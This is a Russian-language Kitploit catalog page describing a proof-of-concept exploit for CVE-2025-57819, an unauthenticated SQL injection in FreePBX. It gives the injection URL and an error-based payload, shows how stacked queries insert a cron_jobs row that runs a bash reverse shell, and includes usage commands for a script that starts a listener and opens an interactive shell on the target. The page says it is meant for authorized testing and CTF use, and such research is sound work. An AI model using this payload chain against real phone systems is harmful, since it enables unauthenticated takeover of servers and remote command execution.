Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-57819-poc — CVE-2025-57819 -> rce | Kitploit
Инструменты/GitHubGitHub/b4sh2/cve-2025-57819-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеРазработка Полезной Нагрузки
GitHubb4sh2/cve-2025-57819-poc

CVE-2025-57819-poc

CVE-2025-57819 -> rce

Репозиторий
72463 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-57819 — FreePBX: неаутентифицированная SQLi → RCE

Одношаговый эксплойт для неаутентифицированной SQL-инъекции в Endpoint Manager FreePBX (CVE-2025-57819), объединённой в удалённое выполнение кода через таблицу cron_jobs FreePBX.

Только для авторизованного тестирования безопасности / использования в CTF.


Уязвимость

Ajax-обработчик модуля endpoint конкатенирует параметр brand напрямую в SQL-запрос, а путь модуля FreePBX\modules\endpoint\ajax обходит проверку Referrer/аутентификации ajax. Это даёт неаутентифицированную error-based SQL-инъекцию (через EXTRACTVALUE) с включёнными записями через стековые запросы.

Точка инъекции:

root@kitploit:~
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax
    &command=model&template=x&model=model&brand=<INJECTION>

Доказательство (чтение на основе ошибок):

root@kitploit:~
brand=x' AND EXTRACTVALUE(1,CONCAT('~',(SELECT USER()),'~')) -- -
→ {"error":{"message":"... XPATH syntax error: '~freepbxuser@localhost~' ..."}}
Скачать инструмент

Затронутые версии: FreePBX 15 < 15.0.66, 16 < 16.0.89, 17 < 17.0.3.

Техника RCE

Сама по себе инъекция только для чтения, но стековые запросы позволяют выполнять записи. FreePBX запускает задания из таблицы cron_jobs через свой cron-менеджер, поэтому вставка строки даёт произвольное выполнение команд (в течение ~60 секунд, расписание * * * * *):

root@kitploit:~
INSERT INTO cron_jobs
  (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)
VALUES ('sysadmin','<job>','<os-command>',NULL,'* * * * *',30,1,1);

Внедрённая команда — это bash-реверс-шелл. Строка cron удаляется автоматически после первого обратного вызова, чтобы избежать повторных подключений.

Требования

root@kitploit:~
pip install requests urllib3

Python 3. Встроенное определение IP (-i/--interface) работает только в Linux; на других платформах используйте --ip.

Использование

root@kitploit:~
# Defaults: interface tun0, port 4444 — starts listener, exploits, drops a shell
python3 exploit.py http://{target}

# Pick a different interface / port
python3 exploit.py http://{target} -i eth0 -p 9001

# Set the listener IP explicitly
python3 exploit.py http://{target} --ip 10.10.15.52

python3 exploit.py --help

Скрипт:

  1. Подтверждает SQLi (узнаёт версию БД).
  2. Запускает TCP-слушатель на выбранном порту.
  3. Внедряет cron-задание с реверс-шеллом и проверяет, что строка добавлена.
  4. Ждёт ~70 секунд обратного вызова, затем открывает интерактивный шелл (с автоматической попыткой апгрейда PTY).
  5. Удаляет внедрённую строку cron.

Ссылки

  • Horizon3.ai — Обновлённые CVE FreePBX: обход аутентификации и RCE
  • watchTowr Labs — FreePBX CVE-2025-57819
  • watchTowr PoC (GitHub)
  • NVD — CVE-2025-57819
  • Рекомендация FreePBX GHSA-m42g-xg4c-5f3h